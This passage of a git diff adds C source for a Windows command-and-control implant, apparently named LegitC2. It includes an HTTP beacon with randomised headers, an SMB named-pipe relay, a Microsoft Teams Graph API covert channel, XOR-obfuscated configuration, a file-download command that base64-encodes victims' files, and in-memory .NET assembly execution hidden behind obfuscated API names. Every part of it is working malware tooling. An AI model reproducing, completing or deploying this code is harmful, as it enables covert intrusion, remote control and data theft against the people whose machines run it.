fr-FR,fr;q=0.9,en-US;q=0.8\r\n", + L"Accept-Language: de-DE,de;q=0.9,en;q=0.8\r\n", + }; + static const wchar_t *_encs[] = { + L"Accept-Encoding: gzip, deflate, br\r\n", + L"Accept-Encoding: gzip, deflate\r\n", + L"Accept-Encoding: br, gzip\r\n", + }; + uint32_t _r = 0; + BCryptGenRandom(NULL, (BYTE *)&_r, sizeof(_r), BCRYPT_USE_SYSTEM_PREFERRED_RNG); + _wh.AddHeaders(hRequest, _langs[_r % 4], (DWORD)-1L, WINHTTP_ADDREQ_FLAG_ADD); + _wh.AddHeaders(hRequest, _encs[(_r >> 8) % 3], (DWORD)-1L, WINHTTP_ADDREQ_FLAG_ADD); + _wh.AddHeaders(hRequest, + L"Cache-Control: no-cache, no-store\r\n", + (DWORD)-1L, WINHTTP_ADDREQ_FLAG_ADD); + wchar_t _ref[512]; + swprintf(_ref, 512, L"Referer: https://%ls/\r\n", host); + _wh.AddHeaders(hRequest, _ref, (DWORD)-1L, WINHTTP_ADDREQ_FLAG_ADD); + } + + if (cfg->http_extra_headers[0]) + { + wchar_t *xhdr_w = _to_wide(cfg->http_extra_headers); + if (xhdr_w) + { + _wh.AddHeaders(hRequest, xhdr_w, (DWORD)-1L, WINHTTP_ADDREQ_FLAG_ADD); + free(xhdr_w); + } + } + + _wh.SetTimeouts(hRequest, 30000, 30000, 30000, 30000); + + BOOL ok = _wh.SendRequest(hRequest, + WINHTTP_NO_ADDITIONAL_HEADERS, 0, + body, (DWORD)strlen(body), (DWORD)strlen(body), 0); + free(body); + + if (!ok || !_wh.RecvResponse(hRequest, NULL)) + { + _wh.Close(hRequest); + _wh.Close(hConnect); + _wh.Close(hSession); + return CHANNEL_ERR; + } + + if (secure && _cert_pin_check(hRequest) != 0) + { + _wh.Close(hRequest); + _wh.Close(hConnect); + _wh.Close(hSession); + return CHANNEL_ERR; + } + + char *resp = NULL; + size_t resp_len = 0; + DWORD avail = 0; + + while (_wh.QueryAvail(hRequest, &avail) && avail > 0) + { + char *tmp = (char *)realloc(resp, resp_len + avail + 1); + if (!tmp) + break; + resp = tmp; + DWORD nread = 0; + _wh.ReadData(hRequest, resp + resp_len, avail, &nread); + resp_len += nread; + resp[resp_len] = '\0'; + } + + _wh.Close(hRequest); + _wh.Close(hConnect); + _wh.Close(hSession); + + if (resp) + { + if (json_str(resp, "p", s_pending, sizeof(s_pending)) == 0 && s_pending[0] != '\0') + s_pending_set = 1; + free(resp); + } + + return CHANNEL_OK; +} + +char *http_recv(void) +{ + if (!s_pending_set || !s_pending[0]) + return NULL; + char *ret = strdup(s_pending); + s_pending[0] = '\0'; + s_pending_set = 0; + return ret; +} diff --git a/agent/src/channels/http_only.c b/agent/src/channels/http_only.c new file mode 100644 index 0000000..5023be6 --- /dev/null +++ b/agent/src/channels/http_only.c @@ -0,0 +1,81 @@ +#include "channels.h" +#include "agent_config.h" +#include +#include + +/* ---- No-op stubs ---- */ + +int github_send(const channel_config_t *cfg, const char *id, const char *b64) +{ (void)cfg; (void)id; (void)b64; return CHANNEL_ERR; } +char *github_recv(const channel_config_t *cfg, const char *id) +{ (void)cfg; (void)id; return NULL; } + +int teams_send(const channel_config_t *cfg, const char *id, const char *b64) +{ (void)cfg; (void)id; (void)b64; return CHANNEL_ERR; } +char *teams_recv(const channel_config_t *cfg, const char *id) +{ (void)cfg; (void)id; return NULL; } + +int doh_send(const channel_config_t *cfg, const char *id, const char *b64) +{ (void)cfg; (void)id; (void)b64; return CHANNEL_ERR; } +char *doh_recv(const channel_config_t *cfg, const char *id) +{ (void)cfg; (void)id; return NULL; } + +/* ---- XOR deobfuscation ---- */ + +static void cfg_decode(const unsigned char *src, size_t len, char *dst) +{ + for (size_t i = 0; i < len; i++) + dst[i] = (char)(src[i] ^ CFG_XOR_KEY[i % CFG_XOR_KEY_LEN]); + dst[len] = '\0'; +} + +/* ---- Config init — beacon_url only ---- */ + +void channel_config_init(channel_config_t *cfg) +{ + memset(cfg, 0, sizeof(*cfg)); + + if (CFG_BEACON_URL_LEN) + cfg_decode(CFG_BEACON_URL, CFG_BEACON_URL_LEN, cfg->beacon_url); +#if defined(CFG_SMB_HOST_LEN) && CFG_SMB_HOST_LEN > 0 + cfg_decode(CFG_SMB_HOST, CFG_SMB_HOST_LEN, cfg->smb_host); +#endif +#if defined(CFG_SMB_PIPE_LEN) && CFG_SMB_PIPE_LEN > 0 + cfg_decode(CFG_SMB_PIPE, CFG_SMB_PIPE_LEN, cfg->smb_pipe); +#endif + +#ifndef NDEBUG + /* Dev override: env var */ + const char *v = getenv("LEGITC2_BEACON_URL"); + if (v && *v) + strncpy(cfg->beacon_url, v, sizeof(cfg->beacon_url) - 1); +#endif + +#if defined(CFG_HTTP_USERAGENT_LEN) && CFG_HTTP_USERAGENT_LEN > 0 + cfg_decode(CFG_HTTP_USERAGENT, CFG_HTTP_USERAGENT_LEN, cfg->http_useragent); +#endif +#if defined(CFG_HTTP_EXTRA_HEADERS_LEN) && CFG_HTTP_EXTRA_HEADERS_LEN > 0 + cfg_decode(CFG_HTTP_EXTRA_HEADERS, CFG_HTTP_EXTRA_HEADERS_LEN, cfg->http_extra_headers); +#endif +#if defined(CFG_CERT_PIN_LEN) && CFG_CERT_PIN_LEN == 64 + cfg_decode(CFG_CERT_PIN, CFG_CERT_PIN_LEN, cfg->http_cert_pin); +#endif +} + +/* ---- Dispatcher ---- */ + +int channel_send(const channel_config_t *cfg, const char *id, const char *b64) +{ + if (cfg->smb_host[0] && smb_send(cfg, id, b64) == CHANNEL_OK) return CHANNEL_OK; + return http_send(cfg, id, b64); +} + +char *channel_recv(const channel_config_t *cfg, const char *id) +{ + (void)id; + if (cfg->smb_host[0]) { + char *r = smb_recv(); + if (r) return r; + } + return http_recv(); +} diff --git a/agent/src/channels/smb.c b/agent/src/channels/smb.c new file mode 100644 index 0000000..8564d70 --- /dev/null +++ b/agent/src/channels/smb.c @@ -0,0 +1,166 @@ +#include "channels.h" +#include +#include +#include +#include +#include + +#define SMB_MAX_RESP 131072 +#define SMB_CONNECT_RETRIES 3 +#define SMB_PIPE_WAIT_MS 3000 + +static char s_pending[SMB_MAX_RESP]; +static int s_pending_set = 0; + +/* internal helpers */ + +static int json_str(const char *json, const char *key, char *out, size_t out_sz) +{ + char needle[128]; + snprintf(needle, sizeof(needle), "\"%s\":", key); + const char *p = strstr(json, needle); + if (!p) + return -1; + p += strlen(needle); + while (*p == ' ') + p++; + if (*p != '"') + return -1; + p++; + size_t i = 0; + while (*p && *p != '"' && i < out_sz - 1) + { + if (*p == '\\' && *(p + 1)) + p++; + out[i++] = *p++; + } + out[i] = '\0'; + return 0; +} + +static BOOL pipe_read_exact(HANDLE h, void *buf, DWORD len) +{ + DWORD done = 0; + while (done < len) + { + DWORD nr = 0; + if (!ReadFile(h, (char *)buf + done, len - done, &nr, NULL) || nr == 0) + return FALSE; + done += nr; + } + return TRUE; +} + +static BOOL pipe_write_exact(HANDLE h, const void *buf, DWORD len) +{ + DWORD done = 0; + while (done < len) + { + DWORD nw = 0; + if (!WriteFile(h, (const char *)buf + done, len - done, &nw, NULL) || nw == 0) + return FALSE; + done += nw; + } + return TRUE; +} + +/* send beacon over SMB named pipe, buffer task from response */ + +int smb_send(const channel_config_t *cfg, const char *agent_id, const char *b64) +{ + if (!cfg->smb_host[0] || !cfg->smb_pipe[0]) + return CHANNEL_ERR; + s_pending_set = 0; + + char path[640]; + snprintf(path, sizeof(path), "\\\\%s\\pipe\\%s", cfg->smb_host, cfg->smb_pipe); + + wchar_t wpath[640] = {0}; + if (MultiByteToWideChar(CP_UTF8, 0, path, -1, wpath, 640) == 0) + return CHANNEL_ERR; + + HANDLE hPipe = INVALID_HANDLE_VALUE; + for (int i = 0; i < SMB_CONNECT_RETRIES && hPipe == INVALID_HANDLE_VALUE; i++) + { + hPipe = CreateFileW(wpath, + GENERIC_READ | GENERIC_WRITE, + 0, NULL, OPEN_EXISTING, 0, NULL); + if (hPipe == INVALID_HANDLE_VALUE) + { + if (GetLastError() != ERROR_PIPE_BUSY) + return CHANNEL_ERR; + WaitNamedPipeW(wpath, SMB_PIPE_WAIT_MS); + } + } + if (hPipe == INVALID_HANDLE_VALUE) + return CHANNEL_ERR; + + /* build JSON body */ + size_t body_sz = strlen(agent_id) + strlen(b64) + 32; + char *body = (char *)malloc(body_sz); + if (!body) + { + CloseHandle(hPipe); + return CHANNEL_ERR; + } + int body_len = snprintf(body, body_sz, "{\"id\":\"%s\",\"p\":\"%s\"}", agent_id, b64); + if (body_len <= 0) { free(body); CloseHandle(hPipe); return CHANNEL_ERR; } + + /* write: 4-byte LE length then payload */ + uint32_t wlen = (uint32_t)body_len; + BOOL ok = pipe_write_exact(hPipe, &wlen, 4) && + pipe_write_exact(hPipe, body, wlen); + free(body); + if (!ok) + { + CloseHandle(hPipe); + return CHANNEL_ERR; + } + + /* read 4-byte LE response length */ + uint32_t rlen = 0; + if (!pipe_read_exact(hPipe, &rlen, 4) || rlen == 0 || rlen >= SMB_MAX_RESP) + { + CloseHandle(hPipe); + return CHANNEL_ERR; + } + + /* read response body */ + char *resp = (char *)malloc(rlen + 1); + if (!resp) + { + CloseHandle(hPipe); + return CHANNEL_ERR; + } + ok = pipe_read_exact(hPipe, resp, rlen); + CloseHandle(hPipe); + if (!ok) + { + free(resp); + return CHANNEL_ERR; + } + resp[rlen] = '\0'; + + /* buffer task if present */ + char task[SMB_MAX_RESP]; + if (json_str(resp, "p", task, sizeof(task)) == 0 && task[0]) + { + strncpy(s_pending, task, sizeof(s_pending) - 1); + s_pending[sizeof(s_pending) - 1] = '\0'; + s_pending_set = 1; + } + free(resp); + return CHANNEL_OK; +} + +/* return task buffered by smb_send, NULL if none */ + +char *smb_recv(void) +{ + if (!s_pending_set || !s_pending[0]) + return NULL; + char *ret = strdup(s_pending); + s_pending[0] = '\0'; + s_pending_set = 0; + return ret; +} \ No newline at end of file diff --git a/agent/src/channels/teams.c b/agent/src/channels/teams.c new file mode 100644 index 0000000..f568465 --- /dev/null +++ b/agent/src/channels/teams.c @@ -0,0 +1,269 @@ +#include "channels.h" +#include "util.h" +#include +#include +#include +#include + +#ifndef CURLSSLOPT_NATIVE_CA +#define CURLSSLOPT_NATIVE_CA (1 << 4) +#endif + +/* ---- libcurl response buffer ---- */ + +typedef struct +{ + char *data; + size_t len; +} curl_buf_t; + +static size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata) +{ + curl_buf_t *buf = (curl_buf_t *)userdata; + size_t nb = size * nmemb; + char *tmp = realloc(buf->data, buf->len + nb + 1); + if (!tmp) + return 0; + buf->data = tmp; + memcpy(buf->data + buf->len, ptr, nb); + buf->len += nb; + buf->data[buf->len] = '\0'; + return nb; +} + +/* get an OAuth2 client_credentials token for the Graph API */ + +static char *teams_get_access_token(const channel_config_t *cfg) +{ + char url[256]; + snprintf(url, sizeof(url), + "https://login.microsoftonline.com/%s/oauth2/v2.0/token", + cfg->teams_tenant_id); + + char body[1024]; + snprintf(body, sizeof(body), + "grant_type=client_credentials" + "&client_id=%s" + "&client_secret=%s" + "&scope=https%%3A%%2F%%2Fgraph.microsoft.com%%2F.default", + cfg->teams_client_id, + cfg->teams_client_secret); + + CURL *curl = curl_easy_init(); + if (!curl) + return NULL; + + curl_buf_t resp = {0}; + + char ua_hdr[320]; + snprintf(ua_hdr, sizeof(ua_hdr), "User-Agent: %s", random_ua()); + + struct curl_slist *hdrs = NULL; + hdrs = curl_slist_append(hdrs, "Content-Type: application/x-www-form-urlencoded"); + hdrs = curl_slist_append(hdrs, ua_hdr); + + curl_apply_opsec(curl); + curl_easy_setopt(curl, CURLOPT_URL, url); + curl_easy_setopt(curl, CURLOPT_HTTPHEADER, hdrs); + curl_easy_setopt(curl, CURLOPT_POSTFIELDS, body); + curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_cb); + curl_easy_setopt(curl, CURLOPT_WRITEDATA, &resp); + curl_easy_setopt(curl, CURLOPT_TIMEOUT, 30L); + + CURLcode res = curl_easy_perform(curl); + long code = 0; + curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &code); + curl_slist_free_all(hdrs); + curl_easy_cleanup(curl); + + if (res != CURLE_OK || code != 200) + { + free(resp.data); + return NULL; + } + + /* Extract "access_token":"" */ + const char *p = strstr(resp.data, "\"access_token\""); + if (!p) + { + free(resp.data); + return NULL; + } + p += strlen("\"access_token\""); + while (*p == ' ' || *p == ':') + p++; + if (*p != '"') + { + free(resp.data); + return NULL; + } + p++; + + size_t i = 0, cap = 2048; + char *tok = malloc(cap); + if (!tok) + { + free(resp.data); + return NULL; + } + while (*p && *p != '"' && i < cap - 1) + tok[i++] = *p++; + tok[i] = '\0'; + free(resp.data); + return tok; +} + +/* make a request to the Microsoft Graph API */ + +static char *graph_request(const char *access_token, const char *url, + const char *method, const char *body_json) +{ + CURL *curl = curl_easy_init(); + if (!curl) + return NULL; + + curl_buf_t resp = {0}; + + struct curl_slist *hdrs = NULL; + char auth_hdr[2400]; + char ua_hdr2[320]; + snprintf(auth_hdr, sizeof(auth_hdr), "Authorization: Bearer %s", access_token); + snprintf(ua_hdr2, sizeof(ua_hdr2), "User-Agent: %s", random_ua()); + hdrs = curl_slist_append(hdrs, auth_hdr); + hdrs = curl_slist_append(hdrs, "Content-Type: application/json"); + hdrs = curl_slist_append(hdrs, ua_hdr2); + + curl_apply_opsec(curl); + curl_easy_setopt(curl, CURLOPT_URL, url); + curl_easy_setopt(curl, CURLOPT_HTTPHEADER, hdrs); + curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_cb); + curl_easy_setopt(curl, CURLOPT_WRITEDATA, &resp); + curl_easy_setopt(curl, CURLOPT_TIMEOUT, 30L); + curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L); + + if (method && strcmp(method, "POST") == 0) + { + curl_easy_setopt(curl, CURLOPT_POST, 1L); + if (body_json) + { + curl_easy_setopt(curl, CURLOPT_POSTFIELDS, body_json); + curl_easy_setopt(curl, CURLOPT_POSTFIELDSIZE, (long)strlen(body_json)); + } + } + else if (method && strcmp(method, "GET") == 0) + { + curl_easy_setopt(curl, CURLOPT_HTTPGET, 1L); + } + + CURLcode res = curl_easy_perform(curl); + long code = 0; + curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &code); + curl_slist_free_all(hdrs); + curl_easy_cleanup(curl); + + if (res != CURLE_OK || code < 200 || code >= 300) + { + free(resp.data); + return NULL; + } + return resp.data; +} + +/* post beacon as a Teams message in the configured channel */ + +int teams_send(const channel_config_t *cfg, const char *agent_id, const char *b64) +{ + if (!cfg->teams_tenant_id[0] || !cfg->teams_team_id[0]) + return CHANNEL_ERR; + + char *token = teams_get_access_token(cfg); + if (!token) + return CHANNEL_ERR; + + char url[512]; + snprintf(url, sizeof(url), + "https://graph.microsoft.com/v1.0/teams/%s/channels/%s/messages", + cfg->teams_team_id, cfg->teams_channel_id); + + /* message format: LC2:{agent_id}:{payload} */ + size_t body_sz = strlen(b64) + 256; + char *body = malloc(body_sz); + if (!body) + { + free(token); + return CHANNEL_ERR; + } + + snprintf(body, body_sz, + "{\"body\":{\"contentType\":\"text\"," + "\"content\":\"LC2:%s:%s\"}}", + agent_id, b64); + + char *resp = graph_request(token, url, "POST", body); + free(body); + free(token); + + if (!resp) + return CHANNEL_ERR; + free(resp); + return CHANNEL_OK; +} + +/* read latest channel messages and find a task for this agent */ + +char *teams_recv(const channel_config_t *cfg, const char *agent_id) +{ + if (!cfg->teams_tenant_id[0] || !cfg->teams_team_id[0]) + return NULL; + + char *token = teams_get_access_token(cfg); + if (!token) + return NULL; + + /* fetch last 10 messages */ + char url[512]; + snprintf(url, sizeof(url), + "https://graph.microsoft.com/v1.0/teams/%s/channels/%s/messages" + "?$top=10&$orderby=createdDateTime+desc", + cfg->teams_team_id, cfg->teams_channel_id); + + char *resp = graph_request(token, url, "GET", NULL); + free(token); + if (!resp) + return NULL; + + /* + * Look for "TASK:{agent_id}:{b64}" in the message content. + * The server posts tasks as: TASK:: + */ + char prefix[64]; + snprintf(prefix, sizeof(prefix), "TASK:%s:", agent_id); + const char *p = strstr(resp, prefix); + if (!p) + { + free(resp); + return NULL; + } + p += strlen(prefix); + + /* Extract until end of JSON string (next \") */ + size_t i = 0, cap = 4096; + char *out = malloc(cap); + if (!out) + { + free(resp); + return NULL; + } + + while (*p && *p != '"' && *p != '\\' && i < cap - 1) + out[i++] = *p++; + out[i] = '\0'; + + free(resp); + if (i == 0) + { + free(out); + return NULL; + } + return out; +} diff --git a/agent/src/commands/download.c b/agent/src/commands/download.c new file mode 100644 index 0000000..8855601 --- /dev/null +++ b/agent/src/commands/download.c @@ -0,0 +1,90 @@ +#include "commands.h" +#include "crypto.h" +#include +#include +#include +#include + +int cmd_download(const char *local_path, char *output_buf, size_t output_size) +{ + if (!local_path || !output_buf) return -1; + + HANDLE fh = CreateFileA( + local_path, + GENERIC_READ, + FILE_SHARE_READ, + NULL, + OPEN_EXISTING, + FILE_ATTRIBUTE_NORMAL, + NULL + ); + + if (fh == INVALID_HANDLE_VALUE) { + snprintf(output_buf, output_size, + "[download] Cannot open %s: error %lu\n", + local_path, GetLastError()); + return -1; + } + + LARGE_INTEGER file_size_li; + if (!GetFileSizeEx(fh, &file_size_li)) { + CloseHandle(fh); + snprintf(output_buf, output_size, "[download] GetFileSizeEx failed\n"); + return -1; + } + + LONGLONG file_size = file_size_li.QuadPart; + + size_t max_raw = (output_size - 64) * 3 / 4; + if ((LONGLONG)max_raw < file_size) { + snprintf(output_buf, output_size, + "[download] File too large (%lld bytes, max %zu). " + "Use chunked download.\n", + file_size, max_raw); + CloseHandle(fh); + return -1; + } + + uint8_t *raw = malloc((size_t)file_size); + if (!raw) { + CloseHandle(fh); + snprintf(output_buf, output_size, "[download] malloc failed\n"); + return -1; + } + + DWORD bytes_read = 0; + BOOL ok = ReadFile(fh, raw, (DWORD)file_size, &bytes_read, NULL); + CloseHandle(fh); + + if (!ok || bytes_read != (DWORD)file_size) { + free(raw); + snprintf(output_buf, output_size, "[download] ReadFile failed: %lu\n", + GetLastError()); + return -1; + } + + char *b64 = base64_encode(raw, (size_t)file_size); + free(raw); + + if (!b64) { + snprintf(output_buf, output_size, "[download] base64_encode failed\n"); + return -1; + } + + /* Output format: "[download] path:\n" */ + int hdr_len = snprintf(output_buf, output_size, + "[download] path:%s\n", local_path); + if (hdr_len < 0 || (size_t)hdr_len >= output_size) { + free(b64); + return -1; + } + + size_t b64_len = strlen(b64); + size_t avail = output_size - (size_t)hdr_len - 1; + if (b64_len > avail) b64_len = avail; + + memcpy(output_buf + hdr_len, b64, b64_len); + output_buf[hdr_len + b64_len] = '\0'; + free(b64); + return 0; +} diff --git a/agent/src/commands/execasm.c b/agent/src/commands/execasm.c new file mode 100644 index 0000000..de63cab --- /dev/null +++ b/agent/src/commands/execasm.c @@ -0,0 +1,312 @@ +#define COBJMACROS +#define INITGUID +#include "commands.h" +#include "crypto.h" +#include "evs_strings.h" +#include +#include +#include +#include +#include +#include +#include + +typedef HRESULT(STDAPICALLTYPE *CorBind_t)( + LPCWSTR pwszVersion, LPCWSTR pwszBuildFlavor, + DWORD dwStartupFlags, REFCLSID rclsid, REFIID riid, LPVOID *ppv); + +static HRESULT _disp0(IDispatch *p, LPCOLESTR name, VARIANT *out) +{ + DISPID did = 0; + HRESULT hr = p->lpVtbl->GetIDsOfNames(p, &IID_NULL, + (LPOLESTR *)&name, 1, LOCALE_USER_DEFAULT, &did); + if (FAILED(hr)) + return hr; + DISPPARAMS dp = {NULL, NULL, 0, 0}; + if (out) + VariantInit(out); + return p->lpVtbl->Invoke(p, did, &IID_NULL, LOCALE_USER_DEFAULT, + DISPATCH_METHOD | DISPATCH_PROPERTYGET, + &dp, out, NULL, NULL); +} + +static HRESULT _disp1(IDispatch *p, LPCOLESTR name, VARIANT *arg, VARIANT *out) +{ + DISPID did = 0; + HRESULT hr = p->lpVtbl->GetIDsOfNames(p, &IID_NULL, + (LPOLESTR *)&name, 1, LOCALE_USER_DEFAULT, &did); + if (FAILED(hr)) + return hr; + DISPPARAMS dp = {arg, NULL, 1, 0}; + if (out) + VariantInit(out); + return p->lpVtbl->Invoke(p, did, &IID_NULL, LOCALE_USER_DEFAULT, + DISPATCH_METHOD | DISPATCH_PROPERTYGET, + &dp, out, NULL, NULL); +} + +static HRESULT _disp_invoke3(IDispatch *p, VARIANT *vObj, VARIANT *vParams, VARIANT *out) +{ + DISPID did = 0; + LPCOLESTR name = L"Invoke_3"; + HRESULT hr = p->lpVtbl->GetIDsOfNames(p, &IID_NULL, + (LPOLESTR *)&name, 1, LOCALE_USER_DEFAULT, &did); + if (FAILED(hr)) + return hr; + VARIANT args[2]; + args[0] = *vParams; + args[1] = *vObj; + DISPPARAMS dp = {args, NULL, 2, 0}; + if (out) + VariantInit(out); + return p->lpVtbl->Invoke(p, did, &IID_NULL, LOCALE_USER_DEFAULT, + DISPATCH_METHOD, &dp, out, NULL, NULL); +} + +static size_t _read_pipe(HANDLE hPipe, char *buf, size_t bufsz) +{ + size_t off = 0; + DWORD got = 0; + while (off < bufsz - 1) + { + DWORD avail = 0; + if (!PeekNamedPipe(hPipe, NULL, 0, NULL, &avail, NULL) || avail == 0) + { + /* wait briefly and retry once */ + Sleep(50); + if (!PeekNamedPipe(hPipe, NULL, 0, NULL, &avail, NULL) || avail == 0) + break; + } + DWORD to_read = (avail < (DWORD)(bufsz - 1 - off)) + ? avail + : (DWORD)(bufsz - 1 - off); + if (!ReadFile(hPipe, buf + off, to_read, &got, NULL)) + break; + off += got; + } + buf[off] = '\0'; + return off; +} + +int cmd_execasm(const uint8_t *asm_bytes, size_t asm_len, + const char *args_str, + char *output_buf, size_t output_size) +{ + if (!asm_bytes || !asm_len || !output_buf || output_size < 128) + return -1; + output_buf[0] = '\0'; + + SECURITY_ATTRIBUTES sa = {sizeof(sa), NULL, TRUE}; + HANDLE hRead = NULL, hWrite = NULL; + if (!CreatePipe(&hRead, &hWrite, &sa, 0)) + { + snprintf(output_buf, output_size, + "[execasm] CreatePipe: %lu\n", GetLastError()); + return -1; + } + SetHandleInformation(hRead, HANDLE_FLAG_INHERIT, 0); + + AllocConsole(); + HWND hwcon = GetConsoleWindow(); + if (hwcon) + ShowWindow(hwcon, SW_HIDE); + + HANDLE hOldOut = GetStdHandle(STD_OUTPUT_HANDLE); + HANDLE hOldErr = GetStdHandle(STD_ERROR_HANDLE); + SetStdHandle(STD_OUTPUT_HANDLE, hWrite); + SetStdHandle(STD_ERROR_HANDLE, hWrite); + + HRESULT hr = E_FAIL; + int ret = -1; + + char _dm[12], _fc[20]; + EVS_D(_dm, EVS_dll_mscoree); EVS_D(_fc, EVS_fn_CorBindToRuntimeEx); + HMODULE hMscoree = LoadLibraryA(_dm); + SecureZeroMemory(_dm, sizeof(_dm)); + if (!hMscoree) + { + SecureZeroMemory(_fc, sizeof(_fc)); + snprintf(output_buf, output_size, "[execasm] clr host missing\n"); + goto restore; + } + + CorBind_t pCorBind = (CorBind_t)(void *)GetProcAddress(hMscoree, _fc); + SecureZeroMemory(_fc, sizeof(_fc)); + if (!pCorBind) + { + snprintf(output_buf, output_size, "[execasm] CorBindToRuntimeEx missing\n"); + FreeLibrary(hMscoree); + goto restore; + } + + ICorRuntimeHost *pHost = NULL; + hr = pCorBind(L"v4.0.30319", L"wks", 0, + &CLSID_CorRuntimeHost, &IID_ICorRuntimeHost, (void **)&pHost); + if (FAILED(hr)) + hr = pCorBind(NULL, L"wks", 0, + &CLSID_CorRuntimeHost, &IID_ICorRuntimeHost, (void **)&pHost); + + if (FAILED(hr) || !pHost) + { + snprintf(output_buf, output_size, + "[execasm] CorBind: 0x%08lx\n", (unsigned long)hr); + FreeLibrary(hMscoree); + goto restore; + } + + hr = ICorRuntimeHost_Start(pHost); + /* 0x80131041 = HOST_E_ALREADY_STARTED — not an error */ + if (FAILED(hr) && hr != (HRESULT)0x80131041UL) + { + snprintf(output_buf, output_size, + "[execasm] CLR Start: 0x%08lx\n", (unsigned long)hr); + ICorRuntimeHost_Release(pHost); + FreeLibrary(hMscoree); + goto restore; + } + + IUnknown *pDomUnk = NULL; + IDispatch *pAppDomain = NULL; + IDispatch *pAssembly = NULL; + IDispatch *pEntryPt = NULL; + SAFEARRAY *pAsmSA = NULL; + VARIANT vAsmArg, vAssembly, vEP, vObj, vParams, vRet; + + hr = ICorRuntimeHost_GetDefaultDomain(pHost, &pDomUnk); + if (FAILED(hr) || !pDomUnk) + { + snprintf(output_buf, output_size, + "[execasm] GetDefaultDomain: 0x%08lx\n", (unsigned long)hr); + goto clr_stop; + } + pDomUnk->lpVtbl->QueryInterface(pDomUnk, &IID_IDispatch, (void **)&pAppDomain); + pDomUnk->lpVtbl->Release(pDomUnk); + + if (!pAppDomain) + { + snprintf(output_buf, output_size, "[execasm] QI IDispatch (AppDomain)\n"); + goto clr_stop; + } + + { + SAFEARRAYBOUND sab = {(ULONG)asm_len, 0}; + pAsmSA = SafeArrayCreate(VT_UI1, 1, &sab); + if (!pAsmSA) + { + snprintf(output_buf, output_size, "[execasm] SafeArrayCreate\n"); + goto clr_stop; + } + void *pData = NULL; + SafeArrayAccessData(pAsmSA, &pData); + memcpy(pData, asm_bytes, asm_len); + SafeArrayUnaccessData(pAsmSA); + } + + VariantInit(&vAsmArg); + vAsmArg.vt = VT_ARRAY | VT_UI1; + vAsmArg.parray = pAsmSA; + + hr = _disp1(pAppDomain, L"Load_3", &vAsmArg, &vAssembly); + VariantClear(&vAsmArg); + pAppDomain->lpVtbl->Release(pAppDomain); + pAppDomain = NULL; + + if (FAILED(hr) || vAssembly.vt != VT_DISPATCH || !vAssembly.pdispVal) + { + snprintf(output_buf, output_size, + "[execasm] AppDomain.Load_3: 0x%08lx\n", (unsigned long)hr); + goto clr_stop; + } + pAssembly = vAssembly.pdispVal; + + hr = _disp0(pAssembly, L"get_EntryPoint", &vEP); + pAssembly->lpVtbl->Release(pAssembly); + pAssembly = NULL; + + if (FAILED(hr) || vEP.vt != VT_DISPATCH || !vEP.pdispVal) + { + snprintf(output_buf, output_size, + "[execasm] get_EntryPoint: 0x%08lx (no static Main?)\n", + (unsigned long)hr); + goto clr_stop; + } + pEntryPt = vEP.pdispVal; + + VariantInit(&vObj); + vObj.vt = VT_NULL; + VariantInit(&vParams); + vParams.vt = VT_NULL; + + if (args_str && args_str[0]) + { + char *dup = _strdup(args_str); + int nargs = 0; + char *tok = strtok(dup, " \t"); + while (tok) + { + nargs++; + tok = strtok(NULL, " \t"); + } + free(dup); + + if (nargs > 0) + { + SAFEARRAYBOUND sb = {(ULONG)nargs, 0}; + SAFEARRAY *pStrSA = SafeArrayCreate(VT_VARIANT, 1, &sb); + dup = _strdup(args_str); + long i = 0; + tok = strtok(dup, " \t"); + while (tok && i < nargs) + { + VARIANT vs; + VariantInit(&vs); + vs.vt = VT_BSTR; + int wlen = MultiByteToWideChar(CP_ACP, 0, tok, -1, NULL, 0); + vs.bstrVal = SysAllocStringLen(NULL, (UINT)(wlen - 1)); + MultiByteToWideChar(CP_ACP, 0, tok, -1, vs.bstrVal, wlen); + SafeArrayPutElement(pStrSA, &i, &vs); + VariantClear(&vs); + i++; + tok = strtok(NULL, " \t"); + } + free(dup); + vParams.vt = VT_ARRAY | VT_VARIANT; + vParams.parray = pStrSA; + } + } + + VariantInit(&vRet); + hr = _disp_invoke3(pEntryPt, &vObj, &vParams, &vRet); + VariantClear(&vParams); + VariantClear(&vRet); + pEntryPt->lpVtbl->Release(pEntryPt); + pEntryPt = NULL; + + ret = (SUCCEEDED(hr) || hr == (HRESULT)0x80131604UL) ? 0 : -1; + if (ret != 0) + snprintf(output_buf, output_size, + "[execasm] Invoke_3: 0x%08lx\n", (unsigned long)hr); + +clr_stop: + ICorRuntimeHost_Stop(pHost); + ICorRuntimeHost_Release(pHost); + FreeLibrary(hMscoree); + +restore: + SetStdHandle(STD_OUTPUT_HANDLE, hOldOut); + SetStdHandle(STD_ERROR_HANDLE, hOldErr); + CloseHandle(hWrite); + FreeConsole(); + + { + size_t off = strlen(output_buf); + size_t avail = output_size > off ? output_size - off - 1 : 0; + if (avail > 0) + off += _read_pipe(hRead, output_buf + off, avail + 1); + if (off == 0) + snprintf(output_buf, output_size, "(no output)\n"); + } + + CloseHandle(hRead); + return ret; +} diff --git a/agent/src/commands/fs.c b/agent/src/commands/fs.c new file mode 100644 index 0000000..7227578 --- /dev/null +++ b/agent/src/commands/fs.c @@ -0,0 +1,186 @@ +/* + * fs.c — filesystem commands: ls, mkdir, rm, cp, mv + */ +#include "commands.h" +#include +#include +#include +#include + +/* internal helpers */ + +static void _ftime_str(const FILETIME *ft, char *buf, size_t sz) +{ + SYSTEMTIME st; + FILETIME local; + FileTimeToLocalFileTime(ft, &local); + FileTimeToSystemTime(&local, &st); + snprintf(buf, sz, "%04u-%02u-%02u %02u:%02u", + (unsigned)st.wYear, (unsigned)st.wMonth, + (unsigned)st.wDay, (unsigned)st.wHour, + (unsigned)st.wMinute); +} + +/* return 1 if path is an existing directory */ +static int _is_dir(const char *path) +{ + DWORD attr = GetFileAttributesA(path); + return (attr != INVALID_FILE_ATTRIBUTES) && + (attr & FILE_ATTRIBUTE_DIRECTORY); +} + +/* list directory contents */ + +int cmd_ls(const char *path, char *output_buf, size_t output_size) +{ + char pattern[MAX_PATH]; + + if (!path || !path[0]) + path = "."; + + /* append \* if path is a directory with no wildcard */ + if (!strchr(path, '*') && !strchr(path, '?') && _is_dir(path)) { + size_t plen = strlen(path); + if (plen + 3 >= sizeof(pattern)) { + snprintf(output_buf, output_size, "[ls] path too long\n"); + return -1; + } + 